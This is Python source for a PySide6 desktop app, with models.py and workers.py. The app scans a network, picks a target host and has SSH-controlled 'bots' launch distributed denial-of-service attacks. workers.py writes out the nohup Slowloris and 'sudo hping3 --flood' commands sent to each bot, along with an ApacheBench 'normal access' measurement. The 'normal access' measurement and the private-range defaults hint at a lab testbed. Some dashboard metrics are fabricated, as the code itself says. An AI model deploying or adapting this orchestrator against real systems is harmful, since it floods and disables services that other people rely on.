            QPushButton:disabled {{
                background: #aaaaaa;
                color: #2e2e30;
                border: 2px solid #aaaaaa;
            }}
            QLabel.big {{ 
                font-family: 'Consolas', monospace;
                font-size: 56px; 
                color: #ff3030;
            }}
            QLabel.timer {{ 
                font-family: 'Consolas', monospace;
                font-size: 48px; 
                color: #f8fa5b; 
                font-weight: bold;
            }}
            QLabel.status {{ 
                color: #f8fa5b; 
                font-family: 'Consolas', monospace;
                font-size: 12px; 
                font-weight: 500;
            }}
            QLabel.metric {{ 
                color: #ff3030; 
                font-family: 'Consolas', monospace;
                font-weight: bold;
                font-size: 12px;
            }}
            QLabel.attack_status {{ 
                font-family: 'Consolas', monospace;
                font-size: 16px; 
                font-weight: bold;
            }}
        """
        self.setStyleSheet(self.base_stylesheet)
        self.worker: Optional[AttackWorker] = None
        self.duration_total = 0
        self.seconds_left = 0
        self.attack_status_color = True

        # Timers
        self.timer_perf = QTimer(self)
        self.timer_perf.timeout.connect(self.update_perf)
        self.timer_perf.start(1000)
        self.timer_count = QTimer(self)
        self.timer_count.timeout.connect(self.tick_countdown)
        self.timer_status_blink = QTimer(self)
        self.timer_status_blink.timeout.connect(self.update_attack_status_color)
        self.timer_status_blink.start(500)

        # Thread pool for scanning
        self.threadpool = QThreadPool()
        self.threadpool.setMaxThreadCount(1)

        # Defaults
        self.inputs["network"].setText("192.168.1.0/24")
        self.inputs["duration"].setText("60")
        self.inputs["port"].setText("5000")
        self.inputs["sockets"].setText("250")
        self.inputs["bots"].setText(str(len(BOTS)))
        self.inputs["attack_type"].setCurrentText("Slowloris")

        # Context stop action
        self.addAction(QAction("Stop Attack", self, triggered=self.stop_attack))
        self.setContextMenuPolicy(Qt.ActionsContextMenu)

        # Connect to bots on startup
        self.connect_bots()

    def resizeEvent(self, event):
        """Resize the attack animation widget to match the main window"""
        self.attack_animation.resize(self.size())
        super().resizeEvent(event)

    def connect_bots(self):
        """Connect to all bots on startup and store connected ones."""
        self.connected_bots = []
        for bot in BOTS:
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(bot.host, username=bot.user, password=bot.password, timeout=5)
                self.connected_bots.append(bot)
                self.append_log(f"[{time.strftime('%H:%M:%S')}] Connected to {bot.host}")
                ssh.close()
            except paramiko.AuthenticationException:
                self.append_log(f"[{time.strftime('%H:%M:%S')}] Authentication failed for {bot.host}")
            except paramiko.SSHException as e:
                self.append_log(f"[{time.strftime('%H:%M:%S')}] SSH error for {bot.host}: {e}")
            except Exception as e:
                self.append_log(f"[{time.strftime('%H:%M:%S')}] Failed to connect to {bot.host}: {e}")
        self.append_log(f"[{time.strftime('%H:%M:%S')}] Total connected bots: {len(self.connected_bots)}")
        self.topo_view.set_bots(self.connected_bots)
        self.update_bot_count()

    def create_left_column(self):
        wrap = QWidget()
        v = QVBoxLayout(wrap)
        v.setSpacing(12)

        # Topology group
        gb_topo = QGroupBox("Total Botnet")
        ltop = QVBoxLayout(gb_topo)
        ltop.setContentsMargins(10, 10, 10, 10)
        self.topo_view = NetworkTopologyView(BOTS)
        ltop.addWidget(self.topo_view)

        # Gauges
        gb_gauges = QGroupBox("")
        lg = QHBoxLayout(gb_gauges)
        lg.setContentsMargins(10, 10, 10, 10)
        self.cpu_gauge = ModernGauge("CPU", QColor("#00e09d"))
        self.ram_gauge = ModernGauge("RAM", QColor("#ff6b6b"))
        lg.addWidget(self.cpu_gauge)
        lg.addWidget(self.ram_gauge)

        # Network chart
        gb_net = QGroupBox("")
        ln = QVBoxLayout(gb_net)
        ln.setContentsMargins(8, 8, 8, 8)
        self.net_chart = EnhancedNetworkChart()
        ln.addWidget(self.net_chart)

        v.addWidget(gb_topo, 3)
        v.addWidget(gb_gauges, 1)
        v.addWidget(gb_net, 1)

        return wrap

    def create_center_column(self):
        wrap = QWidget()
        v = QVBoxLayout(wrap)
        v.setSpacing(12)

        # Timer group
        gb_time = QGroupBox("Attack Duration")
        lt = QVBoxLayout(gb_time)
        lt.setContentsMargins(18, 18, 18, 18)
        self.lbl_time = QLabel("00:00:00", alignment=Qt.AlignCenter)
        self.lbl_time.setProperty("class", "timer")
        if self.dig_font:
            self.lbl_time.setFont(QFont(self.dig_font, 48, QFont.Bold))
        lt.addWidget(self.lbl_time)

        # Attack status and bot count
        status_layout = QHBoxLayout()
        self.lbl_attack_status = QLabel("IDLE")
        self.lbl_attack_status.setProperty("class", "attack_status")
        self.lbl_bot_count = QLabel(f"Active Bots: {len(self.connected_bots)}")
        self.lbl_bot_count.setProperty("class", "metric")
        status_layout.addWidget(self.lbl_attack_status)
        status_layout.addStretch()
        status_layout.addWidget(self.lbl_bot_count)
        lt.addLayout(status_layout)

        # Progress
        gb_proc = QGroupBox("Attack Process")
        lp = QVBoxLayout(gb_proc)
        lp.setContentsMargins(18, 18, 18, 18)

        self.progress = QProgressBar()
        self.progress.setRange(0, 100)
        self.progress.setValue(0)
        self.progress.setFixedHeight(120)
        self.progress.setLocale(QLocale(QLocale.English, QLocale.UnitedStates))
        self.progress.setFormat("%p%")
        self.progress.setStyleSheet("""
            QProgressBar {
                border: 2px solid #ff3030;
                text-align: center;
                background-color: #2e2e30;
                font-family: 'Consolas', monospace;
                font-size: 48px;
                color: #f8fa5b;
            }
            QProgressBar::chunk {
                background: qlineargradient(
                    spread:pad,
                    x1:0, y1:0, x2:1, y2:0,
                    stop:0 #ff3030, stop:1 #aa0000
                );
                border: 1px solid #ff3030;
            }
        """)
        lp.addWidget(self.progress)

        # Log
        gb_log = QGroupBox("Log Monitoring")
        lg = QVBoxLayout(gb_log)
        lg.setContentsMargins(12, 12, 8, 8)
        self.log = QPlainTextEdit()
        self.log.setReadOnly(True)
        lg.addWidget(self.log)

        # Status row
        status_row = QHBoxLayout()
        self.lbl_rps = QLabel("Requests/sec: 0")
        self.lbl_lat = QLabel("Latency: 0 ms")
        self.lbl_state = QLabel("● Idle")
        self.lbl_state.setStyleSheet("color:#00ff88; font-family: 'Consolas', monospace;")
        status_row.addWidget(self.lbl_rps)
        status_row.addSpacing(24)
        status_row.addWidget(self.lbl_lat)
        status_row.addStretch()
        status_row.addWidget(self.lbl_state)
        lg.addLayout(status_row)

        v.addWidget(gb_time, 1)
        v.addWidget(gb_proc, 1)
        v.addWidget(gb_log, 2)

        return wrap

    def create_right_column(self):
        wrap = QWidget()
        v = QVBoxLayout(wrap)
        v.setSpacing(12)

        # Scan section
        gb_scan = QGroupBox("Network Scan")
        gs = QVBoxLayout(gb_scan)
        gs.setContentsMargins(16, 16, 16, 16)

        lbl_network = QLabel("Network Range:")
        lbl_network.setStyleSheet("color: #ff4500; font-family: 'Consolas', monospace; font-size: 12px;")
        gs.addWidget(lbl_network)

        self.inputs["network"] = QLineEdit()
        self.inputs["network"].setPlaceholderText("192.168.1.0/24")
        gs.addWidget(self.inputs["network"]) 

        self.btn_scan = QPushButton("🔍 START SCAN")
        self.btn_scan.clicked.connect(self.start_scan)
        self.btn_scan.setFixedHeight(46)
        gs.addWidget(self.btn_scan)

        # Hosts list
        lbl_hosts = QLabel("Scanned Hosts (Click to Select Target):")
        lbl_hosts.setStyleSheet("color: #ff4500; font-family: 'Consolas', monospace; font-size: 12px;")
        gs.addWidget(lbl_hosts)

        self.hosts_list = QListWidget()
        self.hosts_list.itemClicked.connect(self.select_target)
        gs.addWidget(self.hosts_list)

        v.addWidget(gb_scan)

        gb_ctrl = QGroupBox("DDoS Control")
        g = QVBoxLayout(gb_ctrl)
        g.setContentsMargins(16, 16, 16, 16)

        fields = [
            ("Target URL:", "target", "", QLineEdit),  # Will be set from selection
            ("Attack Type:", "attack_type", "Slowloris", QComboBox),
            ("Port:", "port", "5000", QLineEdit),
            ("Duration (sec):", "duration", "60", QLineEdit),
            ("Sockets (-s):", "sockets", "250", QLineEdit),
            ("Number of Bots:", "bots", str(len(BOTS)), QLineEdit),
        ]

        for label, key, default, widget_cls in fields:
            row = QHBoxLayout()
            lbl = QLabel(label)
            lbl.setStyleSheet("color: #ff4500; font-family: 'Consolas', monospace; font-size: 12px;")
            row.addWidget(lbl)

            if widget_cls == QComboBox:
                w = QComboBox()
                w.addItems(["Slowloris", "hping3"])
                w.setCurrentText(default)
            else:
                w = widget_cls()
                w.setText(default)

            self.inputs[key] = w
            row.addWidget(w)
            g.addLayout(row)

        # Initialize input fields state
        self.update_input_fields("Slowloris")

        g.addSpacing(12)
        self.btn_start = QPushButton("🚀 START ATTACK")
        self.btn_start.clicked.connect(self.start_attack)
        self.btn_start.setFixedHeight(46)
        g.addWidget(self.btn_start)

        self.btn_stop = QPushButton("⏹ STOP ATTACK")
        self.btn_stop.clicked.connect(self.stop_attack)
        self.btn_stop.setFixedHeight(46)
        self.btn_stop.setEnabled(False)
        g.addWidget(self.btn_stop)
        g.addStretch()

        # DDos-Control box
        v.addWidget(gb_ctrl, 2)

        return wrap

    def start_scan(self):
        network = self.inputs["network"].text().strip()
        if not network:
            self.append_log("[!] Network range is empty")
            return
        self.btn_scan.setDisabled(True)
        self.hosts_list.clear()
        self.scanned_hosts = []
        self.selected_target = ""
        self.inputs["target"].setText("")
        self.btn_start.setEnabled(False)

        scan_worker = NmapScanWorker(network, self.bus)
        scan_worker.signals.log.connect(self.append_log)
        scan_worker.signals.scan_completed.connect(self.on_scan_completed)
        self.threadpool.start(scan_worker)

    def on_scan_completed(self, hosts: List[dict]):
        self.btn_scan.setDisabled(False)
        self.scanned_hosts = hosts
        for host in hosts:
            item = QListWidgetItem(f"Host: {host['ip']} - Status: {host['status']}")
            self.hosts_list.addItem(item)

    def select_target(self, item: QListWidgetItem):
        self.selected_target = item.text().split(" - ")[0].replace("Host: ", "")
        self.inputs["target"].setText(self.selected_target)
        self.inputs["target"].setEnabled(True)
        self.btn_start.setEnabled(True)
        self.append_log(f"[{time.strftime('%H:%M:%S')}] Selected target: {self.selected_target}")

    def update_input_fields(self, attack_type: str):
        """Enable/disable input fields and update target based on attack type."""
        if attack_type == "Slowloris":
            self.inputs["sockets"].setEnabled(True)
            self.inputs["port"].setEnabled(True)
            if self.selected_target:
                self.inputs["target"].setText(self.selected_target)
        elif attack_type == "hping3":
            self.inputs["sockets"].setEnabled(False)
            self.inputs["port"].setEnabled(True)
            if self.selected_target:
                self.inputs["target"].setText(self.selected_target)

    def start_attack(self):
        target = self.inputs["target"].text().strip()
        try:
            duration = int(self.inputs["duration"].text().strip() or "60")
        except Exception:
            duration = 60
        try:
            port = int(self.inputs["port"].text().strip() or "80")
        except Exception:
            port = 80
        try:
            sockets = int(self.inputs["sockets"].text().strip() or "250")
        except Exception:
            sockets = 250
        attack_type = self.inputs["attack_type"].currentText()
        try:
            num_bots = int(self.inputs["bots"].text().strip() or "0")
        except Exception:
            num_bots = 0

        if not target:
            self.append_log("[!] No target selected. Please scan and select a host first.")
            return

        try:
            # Reset progress
            self.progress.setValue(0)
            self.duration_total = duration
            self.seconds_left = duration

            # Update status
            self.lbl_attack_status.setText(f"ATTACKING {target}:{port} [{attack_type}]")
            self.lbl_attack_status.setStyleSheet("color:#ff3030;")

            self.btn_start.setEnabled(False)
            self.btn_stop.setEnabled(True)

            # Start countdown timer
            self.timer_count.start(1000)

            # Start attack animation
            self.attack_animation.start_animation()

            # Start topology animation and set target
            self.topo_view.set_target(target)  # ตั้งค่าเป้าหมายให้ topology view
            self.topo_view.start_animation()   # เริ่มอนิเมชันใน topology

            # Spawn worker using the robust AttackWorker from workers.py
            self.worker = AttackWorker(
                bus=self.bus,
                target=target,
                workers=1,
                sockets=sockets,
                duration=duration,
                num_bots=max(1, num_bots),
                attack_type=attack_type,
                port=port,
                connected_bots=self.connected_bots[:max(0, num_bots)]
            )
            self.worker.start()

            self.append_log(f"[{time.strftime('%H:%M:%S')}] Attack started: {attack_type} -> {target}:{port} for {duration}s with {num_bots} bots")

        except Exception as e:
            self.append_log(f"[!] Failed to start attack: {e}")
            self.btn_start.setEnabled(True)
            self.btn_stop.setEnabled(False)

    def stop_attack(self):
        if self.worker:
            try:
                self.worker.stop()
            except Exception as e:
                self.append_log(f"[!] Error stopping worker: {e}")
            self.worker = None
        self.timer_count.stop()
        self.attack_animation.stop_animation()
        self.topo_view.stop_animation()  # หยุดอนิเมชันใน topology
        self.progress.setValue(0)
        self.lbl_time.setText("00:00:00")
        self.lbl_attack_status.setText("IDLE")
        self.lbl_attack_status.setStyleSheet("color:#00ff88;")
        self.btn_start.setEnabled(True)
        self.btn_stop.setEnabled(False)
        self.append_log(f"[{time.strftime('%H:%M:%S')}] Attack stopped")

    def append_log(self, s: str):
        self.log.appendPlainText(s)
        self.log.verticalScrollBar().setValue(self.log.verticalScrollBar().maximum())

    def update_progress(self, v: int):
        self.progress.setValue(v)

    def update_countdown(self, left: int):
        self.seconds_left = left
        self._render_countdown()

    def on_worker_status(self, st: str):
        if st == "idle":
            self.btn_start.setDisabled(False)
            self.btn_stop.setEnabled(False)
            self.timer_count.stop()
            self.lbl_state.setText("● Idle")
            self.lbl_state.setStyleSheet("color:#00ff88; font-family: 'Consolas', monospace;")
            self.lbl_attack_status.setText("IDLE")
            self.topo_view.set_target("")
            self.topo_view.stop_animation()
            # Stop attack animation
            self.attack_animation.stop_animation()

    def update_metrics(self, metrics: dict):
        self.lbl_rps.setText(f"Requests/sec: {metrics.get('rps', 0)}")
        self.lbl_lat.setText(f"Latency: {metrics.get('latency', 0)} ms")

    def tick_countdown(self):
        if self.seconds_left > 0:
            self.seconds_left -= 1
        self._render_countdown()
        if self.duration_total > 0:
            pct = int(100 * (self.duration_total - self.seconds_left) / self.duration_total)
            if pct > self.progress.value():
                self.progress.setValue(min(100, pct))

    def _render_countdown(self):
        sec = max(0, int(self.seconds_left))
        h = sec // 3600
        m = (sec % 3600) // 60
        s = sec % 60
        if self.dig_font:
            self.lbl_time.setFont(QFont(self.dig_font, 48, QFont.Bold))
        self.lbl_time.setText(f"{h:02d}:{m:02d}:{s:02d}")

    def update_perf(self):
        try:
            self.cpu_gauge.setValue(int(psutil.cpu_percent()))
            self.ram_gauge.setValue(int(psutil.virtual_memory().percent))
            self.net_chart.step()
            self.lbl_rps.setText(f"Requests/sec: {int(1200 + psutil.cpu_percent()*3)}")
            self.lbl_lat.setText(f"Latency: {int(90 + psutil.virtual_memory().percent/2)} ms")
        except Exception:
            pass

    def update_bot_count(self):
        self.lbl_bot_count.setText(f"Active Bots: {len(self.connected_bots)}")

    def update_attack_status_color(self):
        """Toggle color of attack status label for blinking effect."""
        if self.lbl_attack_status.text().startswith("ATTACKING"):
            self.attack_status_color = not self.attack_status_color
            color = "#00ff88" if self.attack_status_color else "#ff4500"
            self.lbl_attack_status.setStyleSheet(f"color: {color}; font-family: 'Consolas', monospace; font-size: 16px; font-weight: bold;")
        else:
            self.lbl_attack_status.setStyleSheet("color: #00ff88; font-family: 'Consolas', monospace; font-size: 16px; font-weight: bold;")

    def closeEvent(self, event):
        try:
            if self.worker and getattr(self.worker, 'is_alive', lambda: False)():
                self.worker.stop()
        except Exception:
            pass
        self.attack_animation.stop_animation()
        event.accept()

if __name__ == "__main__":
    os.environ["QT_AUTO_SCREEN_SCALE_FACTOR"] = "1"  # Enable auto-scaling for high DPI
    QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)
    app = QApplication(sys.argv)
    w = Main()
    w.showFullScreen()  # Change to full screen mode
    sys.exit(app.exec())

------------------------------------------------------------------------------------------------------------------------------------
models.py
# models.py
# -*- coding: utf-8 -*-
from PySide6.QtCore import Signal, QObject

class Bus(QObject):
    log = Signal(str)
    progress = Signal(int)
    countdown = Signal(int)
    status = Signal(str)
    metrics = Signal(dict)

class Bot:
    def __init__(self, host: str, user: str, password: str, name: str, role: str = "Attack"):
        self.host = host
        self.user = user
        self.password = password
        self.name = name
        self.role = role  # "Attack" หรือ "Normal"

        # alias เพื่อให้ไฟล์อื่นใช้ได้
        self.ip = host        # ให้เรียก bot.ip ได้
        self.status = role    # ให้เรียก bot.status ได้

------------------------------------------------------------------------------------------------------------------------------------
workers.py
# workers.py (แก้ไขส่วน __init__ และ run ให้ทนทานขึ้น)
# -*- coding: utf-8 -*-
import threading
import time
import random
import paramiko
import re
from config import BOTS
from models import Bus

class AttackWorker(threading.Thread):
    def __init__(self,
                 bus: Bus,
                 target: str,
                 workers: int = 1,
                 sockets: int = 250,
                 duration: int = 60,
                 num_bots: int = 1,
                 attack_type: str = "Slowloris",
                 port: int = 80,
                 connected_bots: list = None):
        super().__init__(daemon=True)
        self.bus = bus
        self.target = target

        # Robust type coercion & validation
        try:
            self.workers = int(workers)
        except Exception:
            self.workers = 1

        try:
            self.sockets = int(sockets)
        except Exception:
            self.sockets = 250

        try:
            self.duration = int(duration)
        except Exception:
            self.duration = 60

        try:
            self.num_bots = int(num_bots)
        except Exception:
            # if conversion fails, try to fallback to 1
            try:
                # if it's a numeric string with spaces etc.
                self.num_bots = int(str(num_bots).strip())
            except Exception:
                self.num_bots = 1

        self.attack_type = str(attack_type)
        try:
            self.port = int(port)
        except Exception:
            self.port = 80

        self.connected_bots = connected_bots if connected_bots is not None else BOTS
        self._stop = False
        self.normal_bot = None  # For normal access bot

    def stop(self):
        self._stop = True

    def _extract_ip(self, target: str) -> str:
        """Extract IP address from target URL or return target if it's already an IP."""
        ip_pattern = r'(\d{1,3}(?:\.\d{1,3}){3})'
        match = re.search(ip_pattern, target)
        if match:
            return match.group(1)
        return target  # Assume it's already an IP if no match

    def run(self):
        # Choose attack target for commands that need bare IP
        attack_target = self._extract_ip(self.target) if self.attack_type == "hping3" else self.target

        # Filter attack-capable bots safely
        attack_bots = [bot for bot in self.connected_bots if getattr(bot, "role", "Attack") == "Attack"]

        # Ensure num_bots is within valid bounds
        if self.num_bots <= 0:
            self.num_bots = 1

        # If not enough bots, reduce to available
        if len(attack_bots) == 0:
            self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] WARNING: No attack-capable bots available.")
            selected_bots = []
        else:
            sample_count = min(self.num_bots, len(attack_bots))
            # random.sample requires integer <= len(sequence)
            try:
                selected_bots = random.sample(attack_bots, sample_count)
            except Exception:
                # fallback: shuffle and slice
                random.shuffle(attack_bots)
                selected_bots = attack_bots[:sample_count]

        self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Using {len(selected_bots)} bots for {self.attack_type} attack")

        # Select the normal node (bot with role="Normal")
        normal_bots = [bot for bot in self.connected_bots if getattr(bot, "role", "") == "Normal"]
        if normal_bots:
            self.normal_bot = normal_bots[0]
            self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Selected {self.normal_bot.host} as normal access bot")
        else:
            self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] No normal node found, skipping normal access")

        # Construct URL for normal access / other commands
        if self.attack_type == "GoldenEye":
            url = self.target
        else:
            url = f"http://{attack_target}:{self.port}/"

        # Commands (unchanged)
        if self.attack_type == "Slowloris":
            cmd = (f"nohup python3 ~/Desktop/slowloris/slowloris.py {attack_target} "
                   f"-s {self.sockets} -p {self.port} > slowloris.log 2>&1 &")
            stop_cmd = "pkill -f slowloris.py"
        elif self.attack_type == "hping3":
            cmd = f"sudo /usr/sbin/hping3 -R {attack_target} -p {self.port} --flood > hping3.log 2>&1 &"
            stop_cmd = "sudo pkill -f hping3"
        else:
            # default fallback
            cmd = (f"nohup python3 ~/Desktop/slowloris/slowloris.py {attack_target} "
                   f"-s {self.sockets} -p {self.port} > slowloris.log 2>&1 &")
            stop_cmd = "pkill -f slowloris.py"

        normal_cmd = (
            f'ab -n 1000 -c 50 -s 120 {url} >> normal_access_detailed.log 2>&1; '
        )

        self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Starting {self.attack_type} attack on {attack_target} port {self.port}")

        # hping3 availability check (kept as-is, safe-guarded)
        if self.attack_type == "hping3":
            for b in selected_bots:
                try:
                    ssh = paramiko.SSHClient()
                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    ssh.connect(b.host, username=b.user, password=b.password, timeout=8)
                    stdin, stdout, stderr = ssh.exec_command("which hping3")
                    hping3_path = stdout.read().decode().strip()
                    if not hping3_path:
                        self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] ERROR: hping3 not found on {b.host}")
                    ssh.close()
                except Exception as e:
                    self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] ERROR checking hping3 on {b.host}: {e}")

        # Start normal access on the selected bot if available
        if self.normal_bot:
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(self.normal_bot.host, username=self.normal_bot.user, password=self.normal_bot.password, timeout=8)
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Starting normal access on {self.normal_bot.host} to {url}")
                ssh.exec_command(normal_cmd)
                ssh.close()
            except Exception as e:
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] ERROR starting normal access on {self.normal_bot.host}: {e}")

        # Start attack on each selected bot (SSH)
        for b in selected_bots:
            if self._stop:
                break
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(b.host, username=b.user, password=b.password, timeout=8)
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Connected to {b.host} • Starting {self.attack_type} attack on port {self.port}")
                stdin, stdout, stderr = ssh.exec_command(cmd)
                error = stderr.read().decode().strip()
                if error:
                    self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] ERROR executing attack on {b.host}: {error}")
                ssh.close()
            except Exception as e:
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] ERROR {b.host}: {e}")

        # Attack loop (seconds)
        start = time.time()
        while not self._stop:
            elapsed = time.time() - start
            if elapsed >= self.duration:
                break
            pct = int((elapsed / max(1.0, float(self.duration))) * 100)
            left = max(0, int(self.duration - elapsed))
            # Emit some fake metrics for UI
            metrics = {
                "rps": int(1200 + (elapsed / max(1.0, float(self.duration))) * 800),
                "latency": int(90 + random.random() * 60)
            }
            # ensure progress between 0..100
            self.bus.progress.emit(min(max(pct, 0), 100))
            self.bus.countdown.emit(left)
            self.bus.metrics.emit(metrics)
            self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Attacking with {self.attack_type}... {pct}%")
            time.sleep(1)

        # Stop normal access if started
        if self.normal_bot:
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(self.normal_bot.host, username=self.normal_bot.user, password=self.normal_bot.password, timeout=8)
                ssh.exec_command("pkill ab")
                ssh.close()
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Stopped normal access on {self.normal_bot.host}")
            except Exception as e:
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Stop error for normal access on {self.normal_bot.host}: {e}")

        # Stop all selected bots
        for b in selected_bots:
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(b.host, username=b.user, password=b.password, timeout=8)
                ssh.exec_command(stop_cmd)
                ssh.close()
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Stopped {self.attack_type} attack on {b.host}")
            except Exception as e:
                self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] Stop error on {b.host}: {e}")

        self.bus.progress.emit(100)
        self.bus.countdown.emit(0)
        self.bus.log.emit(f"[{time.strftime('%H:%M:%S')}] {self.attack_type} attack finished on all bots.")
        self.bus.status.emit("idle")
